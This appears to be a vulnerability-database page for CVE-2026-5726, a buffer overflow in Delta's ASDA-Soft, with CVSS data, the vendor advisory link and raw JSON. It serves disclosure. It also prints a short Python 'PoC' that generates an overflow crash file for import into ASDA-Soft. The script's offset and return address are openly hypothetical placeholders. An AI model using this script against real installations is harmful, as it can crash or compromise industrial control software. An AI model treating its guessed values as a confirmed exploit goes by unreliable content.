Security Vulnerability Report
中文
CVE-2026-5726 CVSS 7.8 HIGH

CVE-2026-5726

Published: 2026-04-08 03:16:08
Last Modified: 2026-04-13 12:49:03
Source: 759f5e80-c8e1-4224-bead-956d7b33c98b

Description

ASDA-Soft Stack-based Buffer Overflow Vulnerability

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:deltaww:asda_soft:*:*:*:*:*:*:*:* - VULNERABLE
ASDA-Soft (所有受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # CVE-2026-5726 PoC Concept # This script generates a malicious file pattern to trigger the stack-based buffer overflow. # Adjust offsets and padding based on specific application analysis. # 1. Create a large payload to crash the application # Typically involves NOP sled + Shellcode + Return Address overwrite offset = 260 # Hypothetical offset to overwrite EIP/RIP ret_addr = b'\x90\x90\x90\x90' # Hypothetical return address (e.g., jmp esp) # Simple payload generation payload = b'A' * offset + ret_addr + b'C' * 100 # 2. Write payload to a file (e.g., a specific project file format) filename = "crash_asda.bin" with open(filename, "wb") as f: f.write(payload) print(f"[+] PoC file generated: {filename}") print("[*] Import this file into ASDA-Soft to trigger the vulnerability.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5726", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2026-04-08T03:16:07.700", "lastModified": "2026-04-13T12:49:03.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ASDA-Soft Stack-based Buffer Overflow Vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deltaww:asda_soft:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.6.0", "matchCriteriaId": "3A0D9215-75A9-49EA-9B85-3F9F7F257700"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00007_ASDA-Soft%20Stack-based%20Buffer%20Overflow%20Vulnerability%20(CVE-2026-5726).pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}